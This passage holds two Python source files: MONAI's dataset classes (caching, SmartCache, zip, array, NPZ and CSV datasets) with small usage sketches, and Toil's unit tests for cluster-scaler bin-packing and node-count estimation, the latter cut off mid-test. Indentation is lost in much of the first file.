Note: should call this func after an entire epoch and must set `persistent_workers=False`
in the PyTorch DataLoader, because it needs to create new worker processes based on the newly
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
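# Minimal sketch for CacheDataset (file names and transform chain are
# illustrative assumptions): cache_rate controls how many items have their
# deterministic transforms precomputed before the first epoch.
def _cache_dataset_sketch():
    from monai.transforms import Compose, LoadImaged, ToTensord
    files = [{"image": f"image{i}.nii.gz"} for i in range(10)]  # hypothetical paths
    xform = Compose([LoadImaged(keys="image"), ToTensord(keys="image")])
    # cache_rate=0.5 caches the first 5 items; the remaining 5 run all transforms lazily
    ds = CacheDataset(data=files, transform=xform, cache_rate=0.5, num_workers=2, progress=False)
    return ds[0], ds[9]  # first item served from the cache, last computed on the fly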
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, with `cache_num=4` and `replace_rate=0.25`,
the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 4: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training, call `set_data()` to update the input data and recompute the cache content; note that you
should call `shutdown()` to stop first, then update the data and call `start()` to restart.
Note:
This replacement will not work in the following cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on Windows (where the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater than or equal to the dataset length, falling back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shut down yet; shutting it down now.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update the cache items for the current epoch; this function needs to be called before every epoch.
If the cache has been shut down before, the `_replace_mgr` thread is restarted.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until the replacement manager is done with the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute the expected items for the replacement in the next epoch and execute the deterministic transforms.
It can use multiple threads to accelerate the computation.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait for the thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
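# Sketch of the 4-step SmartCacheDataset workflow described above (the toy items
# and delay transform are illustrative assumptions): construct the dataset,
# start() the replacement thread, update_cache() before each epoch, shutdown() at the end.
def _smart_cache_sketch(num_epochs=3):
    import monai.transforms as mt
    items = [{"data": i} for i in range(5)]
    ds = SmartCacheDataset(
        data=items,
        transform=mt.SimulateDelayd("data", delay_time=0.01),
        replace_rate=0.25,
        cache_num=4,
        shuffle=False,
        progress=False,
    )
    ds.start()  # launch the background replacement thread
    epoch_items = []
    for _ in range(num_epochs):
        epoch_items = [ds[i] for i in range(len(ds))]  # len(ds) == cache_num
        ds.update_cache()  # swap in the replacement items for the next epoch
    ds.shutdown()
    return epoch_items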
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data (with the same index) together in a tuple.
If the output of a single dataset is already a tuple, flatten it and extend it into the result.
For example: if datasetA returns (img, imgmeta) and datasetB returns (seg, segmeta),
the zipped output is (img, imgmeta, seg, segmeta).
If the datasets do not have the same length, the minimum length among them is used as the
length of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min((len(dataset) for dataset in self.data))
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If training is based on NIfTI-format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training is based on images and their metadata, the array transforms cannot simply be composed
because several transforms receive multiple parameters or return multiple values. Users then need
to define their own callable method to parse the metadata from `LoadImage` or pass the `affine` matrix
to the `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
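# Sketch for NPZDictItemDataset (the in-memory .npz buffer and array shapes are
# illustrative assumptions): `keys` maps the member name inside the .npz file to
# the key used in the returned item dicts.
def _npz_dataset_sketch():
    import io
    buf = io.BytesIO()
    np.savez(buf, imgs=np.zeros((4, 2, 2)), segs=np.ones((4, 2, 2)))
    buf.seek(0)
    ds = NPZDictItemDataset(npzfile=buf, keys={"imgs": "image", "segs": "label"})
    return len(ds), sorted(ds[0].keys())  # -> 4, ['image', 'label']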
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries;
every dictionary maps to a row of the CSV file, and the keys of the dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs`.
It supports loading only specific rows and columns,
and it can also group several loaded columns to generate a new column; for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be an int or a range `[start, end)` of indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs,
row_indices=row_indices,
col_names=col_names,
col_types=col_types,
col_groups=col_groups,
**kwargs,
)
super().__init__(data=data, transform=transform)
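# Sketch for CSVDataset col_groups, mirroring the docstring example above (the CSV
# path and column names are illustrative assumptions; requires the optional pandas
# dependency): several columns are combined into one new list-valued column.
def _csv_dataset_sketch(csv_path="./records.csv"):
    # hypothetical file with columns: image, meta_0, meta_1, meta_2
    ds = CSVDataset(
        filename=csv_path,
        col_groups={"meta": ["meta_0", "meta_1", "meta_2"]},
    )
    row = ds[0]
    return row["image"], row["meta"]  # e.g. "./image0.nii", [11, 12, 13]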
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import Job, JobDescription
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow, travis_test
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
@travis_test
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
@travis_test
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
@travis_test
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
@travis_test
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise the per-job resource requirements, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
@travis_test
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
@travis_test
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
@travis_test
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
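# Small illustration of the BinPackedFit API exercised by the tests above (the
# job shape values are illustrative assumptions): pack 24 one-core, 300-second
# jobs onto t2.micro shapes and ask how many nodes are needed.
def _bin_packing_sketch():
    bpf = BinPackedFit([t2_micro], targetTime=3600)
    for _ in range(24):
        bpf.addJobShape(Shape(wallTime=300,
                              memory=h2b('1G'),
                              cores=1,
                              disk=h2b('1G'),
                              preemptable=False))
    # each t2.micro fits one such job at a time and 12 of them in a 3600s window,
    # so 24 jobs should need 2 nodes
    return bpf.getRequiredNodes()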
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
try:
# In Python 3 we can use a SimpleNamespace as a mock provisioner
self.provisioner = types.SimpleNamespace()
except:
# In Python 2 we should just be able to tack fields onto an object.
# But this has been known to produce:
# AttributeError: 'newobject' object has no attribute 'nodeTypes'
# So we use an Argparse Namespace instead.
import argparse
self.provisioner = argparse.Namespace()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
@travis_test
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
@travis_test
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
